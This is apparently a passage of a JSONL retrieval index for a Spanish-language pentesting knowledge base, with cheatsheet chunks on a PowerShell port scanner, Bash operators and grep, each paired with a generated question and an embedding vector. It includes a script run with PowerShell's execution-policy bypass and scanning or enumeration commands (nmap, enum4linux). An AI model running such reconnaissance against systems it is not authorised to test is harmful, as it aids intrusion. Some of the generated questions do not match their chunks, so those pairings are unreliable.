-0.15744, -0.04307, 0.09502, -0.00733, 0.11194, -0.12919, 0.04436, -0.02168, -0.1547, 0.06607, -0.04729, -0.02716, 0.02034, 0.00629, -0.11485, -0.11388, -0.16528, 0.03016, -0.02251, 0.14747, -0.02603, -0.05074, 0.08323, 0.0474, -0.02601, 0.03967, 0.08049, -0.03038, 0.0164, -0.04919, 0.00683, 0.04185, -0.13464, -0.14308, 0.04286, -0.00338, -0.05263, 0.05417, 0.04592, 0.09524, -0.03095, 0.12307, 0.10227, -0.05871, 0.02948, 0.06825, -0.01173, -0.04233, 0.01455, 0.08386, -0.14764, 0.08629, 0.04403, -0.04785, 0.03406, -0.03227, -0.04087, -0.0446, 0.00961, 0.05383, 0.06637, -0.02622, -0.02064, -0.09764, -0.04318, -0.06577, -0.02929, -0.00618, -0.06363, -0.00543, -0.0106, 0.01306, 0.02667, 0.04823, 0.03596, 0.07749, -0.05342, -0.03106, 0.08047, -0.10019, 0.00463, -0.03575, -0.0951, 0.01391, 0.03332, -0.07186, -0.02585, -0.02323, 0.02462, 0.06092, 0.00651, -0.02885, 0.10599, -0.01916, -0.01478, -0.05009, -0.01462, 0.00056, -0.02351, 0.02674, -0.04538, 0.0514, -0.07038, -0.03955, -0.00352, -0.05065, -0.08307, 0.04827, -0.01355, -0.03074, 0.01501, 0.03729, -0.04635, 0.00038, -0.05389, 0.05106, -0.01428, -0.02296, 0.05286, 0.08614, 0.00355, 0.00434, 0.0411, -0.10247, 0.0174, -0.06762, 0.00498, 0.01622, -0.00609, 0.00401, -0.00666, -0.01902, 0.03409, 0.06209, -0.02624, 0.01166, 0.00508, -0.03005, 0.00688, -0.00889, -0.03032, -0.06334, -0.01679, -0.01832, 0.01467, -0.07473, -0.02817, -0.01014, -0.10731, 0.04335, -0.01041, -0.02161, 0.02952, -0.01429, -0.03222, 0.00282, -0.00697, -0.0238, 0.05404, 0.04655, 0.07446, 0.00853, -0.02352, -0.00308, 0.01972, -0.00691, 0.01565, -0.01452, -0.02086, -0.01311, 0.00471, 0.02159, 0.01962, -0.02094, 0.01511, -0.00139, -0.0339, 0.02582, 0.03842, 0.00744, 0.00439, 0.02781, 0.00324, -0.03223, -0.04003, 0.01176, -0.01254, -0.03999, -0.00343, 0.03997, 0.00238, -0.01796, -0.04187, -0.00489, -0.09223, -0.01059, -0.05646, -0.03433, -0.01193, 0.00107, 0.03277, -0.01955, -0.02229, 0.00144]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "con que puedo controlar el tiempo de espera para conectarme a puertos filtrados sin que se cuelgue?", "v": [0.11592, 0.08927, -0.16832, -0.04486, 0.06444, -0.05971, 0.04179, 0.03783, -0.04638, -0.12526, -0.10568, 0.07363, 0.06639, -0.05561, -0.0527, -0.02993, 0.00842, 0.01725, 0.0238, -0.02771, -0.03051, -0.00978, -0.07641, -0.14181, 0.01592, -0.00767, 0.07626, 0.01683, -0.14076, -0.1126, -0.00313, 0.01796, 0.17908, 0.04824, 0.15447, -0.0503, -0.06077, 0.17687, 0.14345, 0.07004, -0.01025, 0.01751, -0.07152, -0.00824, 0.16022, -0.06801, 0.00807, -0.04281, 0.12031, 0.01203, -0.12766, 0.03797, -0.1355, 0.08951, -0.13328, -0.0039, 0.11073, -0.06719, -0.00021, -0.14055, 0.02164, 0.06576, 0.16187, 0.0425, -0.08131, -0.04714, -0.00273, 0.08171, -0.08099, 0.02577, -0.04088, -0.00875, -0.11644, 0.01296, 0.01682, -0.0339, 0.02062, 0.05494, 0.03755, -0.00304, -0.03337, -0.03957, -0.00517, -0.0432, -0.00822, -0.08837, -0.13611, -0.05944, -0.08089, -0.11377, 0.0593, -0.09071, 0.03035, 0.01105, 0.01194, -0.02585, -0.07458, 0.01229, -0.03625, 0.02798, 0.0837, 0.07752, -0.05899, 0.17858, 0.00718, 0.01886, 0.08686, -0.07412, 0.07287, 0.00905, -0.0111, 0.06222, 0.02323, -0.10975, 0.02827, 0.06207, 0.03237, -0.09498, -0.04785, -0.013, 0.02506, -0.09259, -0.07784, -0.0414, 0.03395, 0.06449, 0.03671, 0.05528, 0.08274, 0.00119, 0.03069, 0.04434, -0.05495, -0.07482, -0.06708, -0.05851, -0.05198, -0.0618, -0.04212, -0.02873, -0.1134, 0.07749, 0.00385, -0.00925, 0.07165, -0.04044, -0.04478, -0.01524, -0.0436, -0.06041, 0.01123, 0.04426, 0.00177, 0.00572, -0.01624, 0.05247, 0.07338, 0.00711, -0.0259, 0.00276, 0.01347, 0.02288, -0.07304, -0.03023, 0.06307, -0.02511, -0.06839, -0.01746, 0.08396, -0.04283, -0.02546, 0.07806, -0.06175, -0.04472, -0.02649, 0.00516, 0.00179, -0.01317, -0.03327, -0.00805, -0.03194, 0.04949, -0.06012, -0.07411, -0.06248, -0.06787, -0.07655, -0.04144, -0.02069, 0.05822, 0.00087, -0.01448, 0.00456, -0.00749, -0.00158, -0.04774, 0.04064, 0.01617, 0.00851, 0.00286, 0.03663, 0.02084, 0.06097, 0.03486, 0.03799, 0.04826, -0.0514, 0.07891, 0.00452, 0.03957, 0.04707, 0.01887, 0.05997, -0.06623, -0.03869, 0.04133, 0.01572, -0.0721, 0.03188, 0.09505, 0.01438, 0.0195, 0.02629, 0.04024, 0.00314, -0.03363, 0.0289, 0.07855, 0.04787, 0.0542, -0.01516, -0.03281, -0.05374, -0.04181, 0.01199, 0.01957, -0.01934, -0.06396, -0.035, -0.01711, 0.04459, 0.0273, 0.032, -0.0171, -0.02311, -0.05358, -0.11309, -0.01144, 0.01096, -0.05281, -0.0012, 0.05151, 0.05918, -0.04714, 0.05789, -0.01249]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "que herramienta me sirve para hacer conexiones largas con un control de tiempo preciso?", "v": [0.09734, 0.20229, -0.19558, -0.13703, 3e-05, -0.12977, -0.13583, 0.043, 0.04704, -0.02968, -0.09008, -0.07507, 0.05137, -0.08767, 0.0431, 0.08745, 0.11557, -0.07051, -0.01541, -0.02203, 0.03086, -0.01629, -0.10241, -0.08323, -0.05433, -0.06326, 0.13383, -0.0646, -0.27105, 0.07201, -0.11691, 0.07299, 0.05681, 0.06684, -0.09015, -0.00196, 0.01043, 0.1656, 0.10186, 0.06937, -0.03463, 0.04921, -0.03117, 0.02421, 0.10986, 0.01696, 0.00512, 0.0216, -0.05111, 0.09402, -0.09991, -0.1355, -0.0903, -0.01056, -0.10169, -0.09877, 0.13683, -0.11522, -0.03807, -0.09352, -0.08854, -0.03258, 0.01968, 0.08126, -0.02561, -0.01363, 0.0127, -0.10847, -0.06303, 0.08422, -0.08859, 0.02002, 0.06372, -0.03081, -0.01373, -0.0382, 0.06584, 0.0615, 0.0243, -0.03966, 0.03222, -0.08307, -0.12408, -0.04985, -0.03594, 0.01273, 0.05614, -0.06052, -0.01657, -0.07603, -0.01006, 0.07057, 0.0255, -0.00713, 0.03247, 0.02974, -0.04475, -0.02783, -0.0003, 0.0474, 0.21401, -0.0298, -0.09202, 0.12044, -0.00268, -0.00938, 0.04001, 0.00897, -0.06412, 0.04834, 0.02203, 0.09698, 0.01605, -0.02773, -0.00629, 0.05326, -0.02845, -0.0494, -0.06896, -0.05083, 0.06936, 0.0066, -0.03327, -0.01087, -0.00015, 0.02918, -0.01201, 0.04019, 0.00207, -0.06893, 0.00185, -0.06189, -0.03205, -0.06377, 0.01666, -0.03638, 0.05507, -0.12191, 0.02733, -0.06703, -0.03103, 0.02931, -0.02373, -0.06371, 0.00663, -0.03, 0.00332, 0.00826, 0.02135, 0.00521, -0.00723, -0.05638, -0.02641, 0.05455, 0.01522, -0.01257, -0.02825, 0.06477, -0.04361, 0.05046, -0.02816, -0.03242, 0.02526, -0.07944, 0.06068, -0.09546, 0.00107, 0.04915, 0.05616, 0.05644, 0.00491, 0.01893, 0.08738, -0.05323, -0.03921, -0.052, -0.05347, -0.01641, -0.02963, -0.06246, -0.00478, -0.04825, -0.02928, -0.03265, 0.05539, -0.00402, -0.00203, 0.0419, -0.02019, 0.04803, -0.03799, -0.00681, 0.08009, 0.00368, 0.04613, 0.01621, 0.05515, -0.05574, 0.00777, -0.01409, 0.01121, -0.05683, 0.02452, 0.0225, -0.00874, 0.10355, -0.01856, 0.00868, 0.03591, 0.04152, 0.08481, 0.0591, 0.04795, -0.0107, -0.00528, -0.02795, 0.00584, -0.00301, -0.02918, -0.01701, 0.03142, -0.06063, 0.01496, 0.03654, 0.0361, 0.00016, 0.03875, 0.01616, -0.02251, -0.01418, 0.00409, -0.06356, 0.00028, -0.0281, 0.01714, -0.10664, 0.02172, -0.03344, -0.01338, -0.00467, -0.04141, 0.02616, 0.00705, 0.03143, -0.05807, -0.02056, -0.03854, -0.03002, -0.10488, -0.07744, -0.01078, -0.02409, 0.0562, 0.02265, 0.02532, -0.00207]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## La regla clave\n- `$c.Connect()` = **sΓ­ncrono**, se cuelga ~21s en puertos filtrados.\n- `$c.BeginConnect()+WaitOne(ms)` = controlas el timeout, **NO se cuelga**.\n- Para lΓ­neas largas: `notepad scan.ps1` y `powershell -ep bypass -File .\\scan.ps1`.\n\nRelacionado: Nmap Β· Puertos olvidados Β· OSCP MOC", "indexar": "cual es la alternativa libre a nmap para evitar cuelgos en puertos bloqueados?", "v": [0.17775, -0.04536, -0.07966, 0.00277, -0.1346, 0.0015, 0.11166, -0.08509, -0.27103, -0.06922, -0.05092, -0.04559, 0.10144, 0.0692, 0.01068, -0.07183, -0.08174, -0.0138, 0.06685, 0.07857, -0.13318, -0.04857, -0.04174, -0.02173, 0.02864, -0.03522, -0.16122, 0.07058, -0.17655, -0.08124, -0.07912, -0.05588, 0.06215, -0.06328, 0.08229, 0.03449, 0.142, 0.04185, 0.16228, -0.01732, 0.04349, -0.0089, -0.022, 0.01195, 0.03646, -0.13545, -0.03415, 0.00686, 0.03353, -0.00672, -0.05092, 0.04849, -0.11998, -0.0121, 0.0494, 0.08388, 0.14868, 0.01703, -0.06611, 0.01905, -0.06917, 0.01379, 0.05189, -0.05755, -0.03922, -0.06405, -0.05837, -0.00682, -0.06508, 0.01107, 0.01279, -0.07264, 0.02937, 0.014, -0.05734, 0.00387, -0.02692, 0.00139, 0.0426, 0.08302, 0.08634, -0.04148, 0.04152, 0.02146, -0.0218, -0.122, -0.09305, -0.04795, -0.04407, -0.08823, 0.12402, 0.04924, 0.02536, 0.11722, -0.03913, -0.08707, -0.033, 0.16068, -0.04602, 0.07016, 0.08506, 0.07064, -0.07773, 0.03842, -0.0238, -0.02698, 0.00681, -0.03402, 0.0303, 0.03313, 0.05985, 0.05436, 0.01731, -0.0517, -0.04011, -0.01104, -0.0142, -0.04189, 0.00797, -0.06119, -0.0464, -0.08903, -0.08781, -0.02964, 0.06072, 0.11807, 0.07421, 0.05751, -0.00721, 0.0601, 0.02493, -0.02581, -0.07315, -0.10595, -0.13056, -0.05981, 0.01202, -0.08064, -0.04753, 0.0663, -0.02968, 0.066, 0.00299, -0.0267, 0.06514, 0.00883, -0.00452, -0.00662, -0.06708, -0.04418, 0.00257, 0.01042, -0.04182, 0.0635, -0.03215, 0.0529, 0.00477, -0.03376, -0.01997, 0.14279, 0.04799, 0.02668, -0.05662, 0.05827, -0.02634, -0.07625, -0.02172, -0.01378, -0.0208, -0.07365, -0.00511, 0.10386, 0.01023, -0.12368, 0.02423, -0.03188, -0.02192, -0.04128, -0.02612, -0.04133, -0.03146, 0.03264, -0.07766, -0.06367, -0.08682, -0.06542, -0.00328, -0.05209, 0.01803, 0.0934, -0.01499, 0.03571, -0.07987, -0.05076, -0.04866, -0.007, 0.03305, -0.0277, -0.00701, -0.00907, -0.00594, 0.02633, 0.03982, -0.02998, 0.0013, -0.0212, -0.09276, 0.06338, 0.01162, 0.07962, 0.05374, -0.03584, 0.09027, -0.01235, -0.03882, 0.01249, -0.04173, -0.00344, 0.00735, 0.03667, 0.00189, 0.08063, -0.0142, 0.06814, 0.00975, 0.00899, 0.03749, 0.07302, 0.02606, 0.00906, -0.01299, -0.02764, -0.00547, 0.023, 0.01971, 0.05008, -0.03653, 0.01263, 0.01331, -0.00308, 0.09082, 0.00983, 0.0082, -0.05336, 0.0009, -0.01544, -0.0554, 0.01314, -0.04075, -0.01215, 0.00086, 0.08319, -0.02318, 0.01219, 0.04606, 0.00882]} +{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "con quΓ© puedo ejecutar varios comandos uno tras otro en Linux?", "v": [0.014, 0.13598, -0.10505, -0.00682, -0.02939, -0.08414, -0.02357, 0.06847, -0.12788, -0.06704, -0.06359, -0.02164, 0.08392, -0.05688, 0.0543, -0.02344, 0.05916, -0.05551, -0.01134, -0.11517, -0.03116, -0.02799, -0.0693, -0.03256, 0.11497, 0.02642, 0.09764, -0.05411, -0.03301, -0.02377, -0.12166, 0.1028, 0.06278, -0.01179, -0.01806, 0.10357, -0.04549, 0.04362, 0.08402, 0.17421, 0.016, 0.01118, -0.08692, 0.03276, -0.06836, -0.18287, 0.04723, -0.0411, 0.10594, -0.20282, 0.11935, -0.0223, -0.10893, -0.06925, 0.00429, -0.05078, 0.1712, -0.0978, 0.04307, 0.01414, -0.10454, -0.03782, 0.03634, 0.04767, 0.03717, 0.02634, -0.08223, -0.13198, -0.05113, 0.05183, -0.07406, 0.16061, -0.10122, 0.06423, 0.03301, 0.01789, -0.0936, 0.03058, 0.08891, 0.01928, -0.01124, 0.01006, -0.03253, 0.05018, -0.07155, -0.16984, -0.07295, -0.00237, -0.02812, 0.04415, 0.06305, 0.00656, 0.02207, 0.03963, 0.09749, 0.08988, 0.08906, 0.09078, 0.01363, -0.01614, -0.03475, 0.03048, -0.13864, 0.13093, -0.00992, 0.0364, 0.03441, -0.0517, 0.04173, -0.0312, 0.03838, -0.0588, 0.04935, -0.04307, -0.11268, -0.08319, -0.08004, -0.01294, -0.00152, 0.00144, -0.11631, 0.02695, 0.01992, 0.0743, 0.0057, -0.04889, -0.0563, 0.09741, -0.00083, -0.03082, 0.00777, -0.07269, 0.10007, -0.03129, -0.04081, 0.13638, 0.04288, -0.07189, -0.08072, -0.10529, 0.05954, 0.04055, 0.05061, 0.04109, 0.11359, -0.01874, 0.00816, -0.09198, -0.05806, -0.04158, 0.03702, 0.03034, -0.01211, 0.00856, -0.08392, -0.05247, 0.00689, -0.00283, -0.03342, 0.02116, -0.03284, -0.02433, -0.05281, 0.04082, 0.0085, -0.01342, -0.03205, 0.01356, -0.02584, 0.05079, 0.00876, 0.07245, -0.02558, -0.044, 0.04331, -0.12078, -0.00541, -0.04052, 0.02246, 0.00127, -0.02172, 0.0662, -0.03282, -0.01125, 0.02615, 0.00263, -0.06842, 0.04684, -0.01475, 0.02815, 0.00231, 0.08165, -0.00986, -0.04862, -0.00434, 0.02292, 0.00126, -0.00104, -0.08537, -0.01895, -0.08585, 0.0507, 0.01492, -0.03472, 0.03691, 0.00619, -0.06875, 0.08395, -0.03132, 0.02415, 0.02862, 0.02609, 0.08232, 0.00448, -0.01817, -0.0117, 0.01534, 0.02359, 0.01537, -0.00835, 0.01661, 0.02618, 0.0881, -0.05525, 0.02949, -0.05302, -0.01796, -0.01952, 0.03559, 0.03883, 0.03034, -0.00734, -0.00858, -0.01486, 0.02027, 0.00578, -0.01175, 0.02963, 0.00236, -0.01303, -0.02, 0.07125, -0.00451, -0.10497, -0.04085, -0.06207, -0.08961, 0.00153, -0.04928, -0.06107, -0.02439, 0.03175, 0.02105, -0.05182, -0.07275, -0.02052]} +{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "cΓ³mo hago para que un script redirija la salida a un archivo o una entrada desde uno?", "v": [-0.10545, -0.03583, 0.01232, -0.03835, 0.07537, -0.15058, -0.09389, -0.01968, 0.02462, -0.03279, -0.13695, -0.25445, 0.07444, -0.01867, 0.0586, -0.05528, 0.08506, 0.16268, 0.08818, -0.04336, -0.08801, 0.15993, 0.0861, 0.06916, -0.01211, -0.07695, 0.13799, 0.14209, -0.20124, -0.04054, -0.00331, -0.02765, 0.02742, -0.08523, -0.04817, 0.02488, 0.15432, 0.05, -0.07539, 0.14322, -0.09104, -0.01792, -0.02911, 0.03486, -0.01596, -0.07979, 0.05489, 0.07557, 0.03765, 0.00816, 0.08882, -0.11583, -0.04055, 0.05067, -0.04926, -0.0208, -0.05569, -0.16555, -0.03901, 0.00463, -0.04312, 0.12391, -0.10536, 0.03316, -0.00535, -0.02307, -0.05752, 0.00029, -0.05979, 0.07384, -0.1305, 0.02692, -0.10698, 0.07746, -0.03145, 0.00845, -0.07253, -0.07922, -0.0429, 0.00893, -0.00321, -0.03048, 0.03831, -0.05913, -0.10573, -0.06775, 0.03132, 0.0078, -0.03562, 0.00089, 0.04297, -0.04089, -0.04727, -0.00055, -0.03969, -0.05078, -0.02522, -0.01847, 0.00476, -0.00405, -0.06177, 0.01946, -0.00982, 0.08627, 0.13874, 0.06433, 0.08184, 0.03436, -0.02643, 0.02106, -0.01061, 0.08082, 0.04185, 0.02565, -0.17452, 0.0389, -0.02482, 0.03264, 0.00026, -0.01461, -0.03546, -0.02643, -0.03162, -0.03087, -0.03856, -0.06862, -0.08303, 0.0163, -0.06263, -0.01904, -0.10513, 0.06009, -0.13093, -0.00939, 0.02467, 0.01232, 0.05088, 0.06207, -0.06102, -0.0754, 0.05745, -0.02622, -0.01469, 0.00017, 0.02947, -0.03035, -0.07048, -0.05447, -0.07886, -0.04593, -0.02947, -0.01079, 0.00469, -0.03333, -0.02137, 0.08214, 0.06447, -0.08192, -0.05601, 0.02909, -0.02504, 0.0427, -0.04154, -0.02458, 0.05248, -0.07445, -0.02027, -0.06823, 0.01028, -0.0674, -0.00297, 0.05559, -0.04645, -0.07277, 0.02961, 0.00374, -0.04674, -0.10864, -0.0068, -0.01676, 0.02754, -0.00253, 0.01422, 0.10697, 0.00781, -0.06031, 0.09218, -0.07016, -0.01592, 0.01452, -0.04752, 0.03768, -0.01292, 0.00394, 0.01095, 0.02278, -0.07109, -0.01382, -0.0005, 0.03328, -0.0597, -0.05021, 0.04863, -0.02567, -0.01284, -0.01939, -0.08903, -0.02493, -0.02035, 0.00013, 0.07448, 0.03646, 0.06611, 0.00869, -0.06685, 0.03334, 0.04043, 0.03554, 0.0188, 0.0058, 0.08037, 0.06496, 0.08245, -0.00598, -0.00357, -0.01121, 0.01276, 0.0191, -0.05031, 0.03259, 0.02087, 0.06394, -0.0597, 0.04297, 0.02553, 0.02111, -0.02148, -0.00973, -0.04572, -0.07382, -0.00705, 0.03353, -0.0121, -0.04487, -0.03628, -0.01313, -0.03968, 0.06194, 0.03679, -0.0327, -0.0276, -0.04267, 0.073, 0.01033, 0.03408, -0.03114]} +{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores Bash\n\n> Lo primero que hay que tener claro para encadenar comandos en Kali. Base de Bucles bash sobre IPs.\n\n```\n| tuberΓ­a: salida de uno β†’ entrada del siguiente grep open f | wc -l\n> redirige salida (SOBREESCRIBE) nmap ... > out.txt\n>> redirige AΓ‘ADIENDO al final echo nota >> log.txt\n< redirige ENTRADA desde fichero enum4linux -a IP < /dev/null\n2> redirige ERRORES (stderr) cmd 2>/dev/null\n2>&1 junta errores con salida normal cmd > todo.txt 2>&1\n; secuencia (uno tras otro, pase lo que pase) cd /tmp; ls; pwd\n&& AND: el 2ΒΊ solo si el 1ΒΊ tuvo Γ‰XITO mkdir loot && cd loot\n|| OR: el 2ΒΊ solo si el 1ΒΊ FALLΓ“ ping -c1 IP || echo caido\n& segundo plano (background) nmap -p- IP &\n$( ) sustituciΓ³n de comando for ip in $(grep ...)\n* comodΓ­n enum_*.txt\n```", "indexar": "quΓ© alternativas libres existen para encadenar comandos y filtrar datos por IP?", "v": [0.06068, -0.02387, -0.086, -0.08908, 0.01339, -0.20776, 0.08635, -0.0334, -0.24955, -0.00156, 0.07503, -0.15054, -0.03748, -0.1237, -0.01635, 0.08603, 0.05544, -0.07211, 0.05957, -0.14628, -0.08365, 0.05557, -0.16836, -0.17281, -0.11164, 0.03526, -0.01116, 0.04642, -0.13486, -0.04723, -0.04486, -0.03121, 0.00978, 0.05883, -0.14063, -0.01868, -0.0266, 0.10367, -0.09005, 0.03395, 0.02346, 0.07113, -0.05559, 0.01167, 0.02159, -0.0143, -0.12385, 0.07065, 0.1334, -0.02416, -0.04753, -0.0695, 0.03473, 0.04547, -0.11417, -0.00809, 0.11521, -0.06503, -0.04083, 0.04635, -0.10237, 0.05609, 0.11944, 0.05961, -0.00153, -0.06254, -0.01963, -0.02352, -0.07099, 0.14216, 0.00894, 0.03124, -0.07093, 0.03685, -0.00422, -0.00992, 0.02221, -0.01397, 0.07524, 0.05017, -0.02678, 0.01335, -0.0978, 0.03199, -0.02752, -0.08088, 0.03322, -0.14661, -0.08111, -0.04115, 0.07339, 0.07493, -0.00088, 0.08656, 0.06621, 0.05449, 0.03988, 0.04497, -0.00989, 0.03792, -0.04471, 0.05387, -0.14144, 0.09516, 0.08549, 0.08656, 0.05736, 0.01057, 0.00122, 0.00671, -0.10831, -0.05031, 0.02657, -0.09239, 0.01295, -0.07337, 0.0202, -0.07607, 0.02114, 0.012, -0.0179, 0.01585, 0.00509, -0.03027, 0.00691, 0.07002, 0.01472, 0.05988, -0.00346, 0.04888, 0.03454, 0.02871, -0.01929, -0.14801, 0.00949, 0.07692, -0.03307, -0.06264, -0.08357, -0.04706, 0.03152, 0.01859, -0.06625, 0.03694, 0.09124, -0.05673, 0.07176, -0.02482, -0.06205, -0.08199, 0.03259, -0.00196, -0.00135, 0.0715, -0.0639, 0.05845, -0.01898, -0.10729, -0.08825, 0.05808, -0.00579, 0.02488, -0.0473, 0.02995, 0.04505, -0.0191, -0.01449, -0.0096, -0.00175, -0.01414, 0.04315, 0.0543, 0.01915, -0.13256, 0.04828, -0.03702, -0.03573, -0.04715, -0.01477, -0.00667, 0.05069, 0.00752, -0.05449, -0.08088, 0.00766, -0.00605, -0.00814, -0.01881, -0.03523, -0.01334, 0.00707, 0.09341, -0.04723, -0.04152, 0.06741, -0.03221, 0.03912, -0.0517, -0.02521, 0.00857, -0.07093, 0.07142, -0.02336, 0.01903, -0.02913, 0.03608, 0.0082, 0.00552, 0.06401, -0.03607, -0.01947, 0.00861, 0.06002, -0.05235, -0.04735, 0.02709, 0.0869, 0.02912, 0.01658, -0.02858, 0.0276, 0.0307, 0.03536, -0.03386, -0.0003, 0.04244, -0.01517, -0.00599, 0.03329, -0.02928, -0.00148, -0.01334, -0.05551, -0.02487, -0.00378, 0.00735, -0.03672, 0.02623, 0.01418, -0.02812, -0.00828, 0.01942, -0.00684, -0.06823, 0.03434, -0.06128, -0.11645, 0.0503, -0.00668, -0.01591, -0.05254, -0.0307, -0.0176, -0.02681, -0.02843, -0.02119]} +{"tipo": "pregunta", "herramienta": "Operadores Bash", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores Bash.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## grep ΓΊtiles\n```\ngrep -v invertir (excluir) grep -i ignorar mayus/minus\ngrep -r recursivo grep -l solo nombre del fichero\ngrep -c contar coincidencias\n```\n\n- `< /dev/null` evita que un comando se cuelgue pidiendo `Password:` (clave en bucles).\n\nRelacionado: Operadores PowerShell Β· Bucles bash sobre IPs Β· OSCP MOC", "indexar": "que hay para buscar recursivamente dentro de muchos archivos?", "v": [-0.11159, 0.01433, -0.02739, -0.19881, 0.07766, -0.04921, -0.0369, 0.02851, 0.01743, -0.08504, -0.1063, -0.13065, 0.07743, 0.07029, 0.07172, -0.08741, 0.02389, 0.11246, 0.01042, -0.0349, 0.00379, -0.07644, 0.00548, -0.01389, 0.00215, -0.11664, -0.02608, 0.05669, -0.12822, -0.10198, -0.01588, 0.0699, -0.00126, -0.04986, -0.15491, 0.03397, 0.08328, 0.07212, -0.17758, -0.03478, -0.0134, 0.09858, -0.22096, 0.02307, -0.15039, -0.08485, 0.00439, 0.01795, -0.00943, -0.01827, -0.09343, -0.06855, -0.09242, 0.12125, -0.00575, -0.03442, -0.00139, -0.05778, 0.06246, -0.18312, -0.14941, 0.08134, -0.00834, 0.03214, -0.00922, 0.02847, 0.01545, -0.00696, -0.04007, 0.03117, -0.04836, -0.00672, 0.02675, -0.02299, -0.00927, 0.05501, 0.08212, 0.01072, 0.07527, 0.09689, -0.0375, -0.10462, -0.05434, -0.03855, -0.04228, -0.07329, 0.08581, 0.01063, 0.04776, -0.04611, 0.01082, -0.02921, -0.05084, 0.07103, -0.0279, 0.02527, 0.03018, 0.02647, 0.00695, 0.02507, -0.09188, -0.04192, -0.04207, 0.17543, 0.06248, 0.11328, -0.01218, 0.0183, -0.02466, -0.06091, 0.04879, 0.00273, 0.05229, 0.00706, -0.1268, 0.02703, -0.09729, -0.06425, 0.02917, 0.02951, 0.0105, 0.03777, -0.04667, -0.012, 0.05807, -0.03391, 0.04561, 0.04846, -0.01004, 0.05089, 0.0357, 0.01384, -0.04656, 0.02644, -0.1097, -0.00612, 0.15378, 0.05291, 0.011, -0.03895, 0.15769, -0.01782, -0.00133, -0.08291, 0.0866, 0.08401, 0.01903, 0.03042, -0.08109, -0.14003, -0.05089, -0.0277, 0.01823, -0.0515, -0.03827, 0.06462, 0.02636, -0.15239, 0.00857, 0.03555, -0.09659, 0.0358, -0.05525, 0.03055, -0.00097, -0.0285, -0.01678, -0.0559, 0.05536, -0.06502, -0.01567, -0.05583, -0.08207, -0.06401, -0.00844, 0.06854, -0.03679, -0.02689, 0.05765, -0.09144, 0.01737, -0.07105, -0.05357, 0.01229, 0.01069, -0.04658, 0.06384, 0.05006, 0.01133, 0.01265, 0.05235, 0.0261, -0.04667, 0.0157, -0.05207, -0.00277, -0.01876, -0.01006, 0.03772, -0.03195, -0.00236, -0.00184, -0.05691, 0.05365, 0.06239, -0.00721, -0.05176, 0.00338, 0.05116, 0.00039, 0.06141, -0.04283, 0.11021, 0.01398, -0.08297, 0.02561, 0.01353, -0.00138, -0.01689, 0.04646, 0.04816, 0.04855, 0.05341, 0.07973, -0.03694, -0.01595, 0.02725, -0.03144, -0.02546, -0.01289, -0.01809, 0.05378, -0.02271, -0.05375, -0.00613, 0.00064, 0.00549, -0.02326, 0.01406, -0.03113, 0.01137, 